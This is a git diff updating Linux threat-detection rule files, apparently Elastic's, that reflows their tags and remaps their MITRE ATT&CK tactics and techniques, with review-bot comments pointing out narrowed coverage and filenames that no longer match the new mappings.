"https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml index 93c5361d32a..6f8a2777a56 100644 --- a/rules/linux/impact_potential_bruteforce_malware_infection.toml +++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -83,16 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" query = ''' 
@@ -166,42 +157,11 @@ from logs-endpoint.events.network-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1496" -name = "Resource Hijacking" -reference = "https://attack.mitre.org/techniques/T1496/" +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml index 1e74cf2cb47..9bc8e27141c 100644 --- a/rules/linux/initial_access_first_time_public_key_authentication.toml +++ b/rules/linux/initial_access_first_time_public_key_authentication.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -82,14 +82,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -99,16 +92,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["system.auth.ssh.signature"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml index d1e0215d442..75bb96d09b0 100644 
--- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,14 +75,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -92,16 +85,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["related.ip"] diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml index ffc5417fe60..6abae46e1a9 100644 --- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml +++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -59,14 +59,7 @@ SSH (Secure Shell) is a protocol used to securely access and manage Linux system
 risk_score = 21
 rule_id = "5b8d7b94-23c6-4e3f-baed-3a4d0da4f19d"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -76,16 +69,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["related.user"]
diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
index 159ac1545b7..56abd0cda0b 100644
--- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
+++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/24"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/02/24"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -76,19 +76,7 @@ references = [
 risk_score = 99
 rule_id = "ab7795cc-0e0b-4f9d-a934-1f17a58f869a"
 severity = "critical"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Tactic: Lateral Movement",
- "Resources: Investigation Guide",
- "Use Case: Vulnerability",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne"
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Initial Access", "Resources: Investigation Guide", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -101,26 +89,13 @@ process where host.os.type == "linux" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1210"
-name = "Exploitation of Remote Services"
-reference = "https://attack.mitre.org/techniques/T1210/"
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
diff --git a/rules/linux/lateral_movement_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml
index 742506ac792..7f53f2f17ee 100644
--- a/rules/linux/lateral_movement_kubeconfig_file_activity.toml
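Review bot: Removing the TA0008/T1210 `[[rule.threat]]` block together with the `Tactic: Lateral Movement` tag leaves this telnetd auth-bypass rule mapped only to Initial Access (T1190), while the same commit adds a Lateral Movement mapping alongside Initial Access to the two SSH-authentication rules above. Exploitation of a telnet service reached from an already-compromised internal host is T1210 rather than T1190, so the narrowing reduces ATT&CK coverage for the internal-source case. If it is deliberate, the rule description and investigation guide outside this hunk should be checked so they no longer describe that case; otherwise the removed block should be restored (its two doubled blank lines can go).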
+++ b/rules/linux/lateral_movement_kubeconfig_file_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -87,19 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "Domain: Container",
- "Domain: Kubernetes",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Lateral Movement",
- "Tactic: Defense Evasion",
- "Tactic: Initial Access",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Defend for Containers",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -126,37 +114,16 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml
index d7738588cf4..a7ae98d712e 100644
--- a/rules/linux/lateral_movement_ssh_it_worm_download.toml
+++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/21"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
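Review bot: After this hunk the only tactic left on `lateral_movement_kubeconfig_file_activity.toml` is Credential Access (TA0006 / T1552.001), so the `lateral_movement_` filename prefix no longer matches the rule's mapping; the same drift appears in `lateral_movement_ssh_it_worm_download.toml` and `lateral_movement_telnet_network_activity_external.toml` (now Command and Control only) and in `persistence_bpf_probe_write_user.toml` and `persistence_bpf_program_or_map_load.toml` (now Defense Evasion only). Whether these files get renamed or the tactic-prefix convention is dropped should be an explicit decision rather than a side effect; a rename can be a follow-up since paths may be referenced by other tooling. The rule name, description and investigation guide sit outside this hunk and presumably still describe lateral movement, defense evasion and initial access, so they need a matching pass.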
@@ -86,18 +86,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Lateral Movement",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Auditd Manager",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -112,26 +101,11 @@ process where host.os.type == "linux" and event.type == "start" and
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1021.004"
-name = "SSH"
-reference = "https://attack.mitre.org/techniques/T1021/004/"
-
-[[rule.threat.technique]]
-id = "T1563"
-name = "Remote Service Session Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1563.001"
-name = "SSH Hijacking"
-reference = "https://attack.mitre.org/techniques/T1563/001/"
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml
index 40cf153f80e..23ddb98d3b1 100644
--- a/rules/linux/lateral_movement_telnet_network_activity_external.toml
+++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/23"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -98,15 +98,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit
 - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Lateral Movement",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by process.entity_id
@@ -125,11 +117,11 @@ sequence by process.entity_id
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
 [rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml
index 121bf350707..4b6cb28a48d 100644
--- a/rules/linux/persistence_apt_package_manager_execution.toml
+++ b/rules/linux/persistence_apt_package_manager_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Execution",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
- "Data Source: Crowdstrike",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=5s
@@ -136,34 +125,6 @@ sequence by host.id with maxspan=5s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1546.016"
-name = "Installer Packages"
-reference = "https://attack.mitre.org/techniques/T1546/016/"
-
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -182,7 +143,17 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1546"
+name = "Event Triggered Execution"
+reference = "https://attack.mitre.org/techniques/T1546/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1546.016"
+name = "Installer Packages"
+reference = "https://attack.mitre.org/techniques/T1546/016/"
+
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml
index 6fa37d13b3e..bc63025e540 100644
--- a/rules/linux/persistence_apt_package_manager_file_creation.toml
+++ b/rules/linux/persistence_apt_package_manager_file_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/03"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,15 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -143,11 +135,6 @@ file.path : "/etc/apt/apt.conf.d/*" and not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
 [[rule.threat.technique]]
 id = "T1546"
 name = "Event Triggered Execution"
@@ -158,20 +145,7 @@ id = "T1546.016"
 name = "Installer Packages"
 reference = "https://attack.mitre.org/techniques/T1546/016/"
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml
index 7e83bb830d6..771e00482fd 100644
--- a/rules/linux/persistence_apt_package_manager_netcon.toml
+++ b/rules/linux/persistence_apt_package_manager_netcon.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/02/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,16 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Tactic: Command and Control",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence by host.id with maxspan=5s
@@ -117,9 +108,22 @@ sequence by host.id with maxspan=5s
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1546"
@@ -131,28 +135,7 @@ id = "T1546.016"
 name = "Installer Packages"
 reference = "https://attack.mitre.org/techniques/T1546/016/"
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml
index c0e77855ab2..515d9e16b55 100644
--- a/rules/linux/persistence_at_job_creation.toml
+++ b/rules/linux/persistence_at_job_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/31"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -130,9 +130,9 @@ name = "At"
 reference = "https://attack.mitre.org/techniques/T1053/002/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -148,9 +148,9 @@ name = "At"
 reference = "https://attack.mitre.org/techniques/T1053/002/"
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -166,6 +166,6 @@ name = "At"
 reference = "https://attack.mitre.org/techniques/T1053/002/"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml
index 291d6f8eaa7..2e4260eed94 100644
--- a/rules/linux/persistence_boot_file_copy.toml
+++ b/rules/linux/persistence_boot_file_copy.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/22"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -77,15 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Data Source: Elastic Defend",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -130,43 +122,20 @@ id = "T1542"
 name = "Pre-OS Boot"
 reference = "https://attack.mitre.org/techniques/T1542/"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
-
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
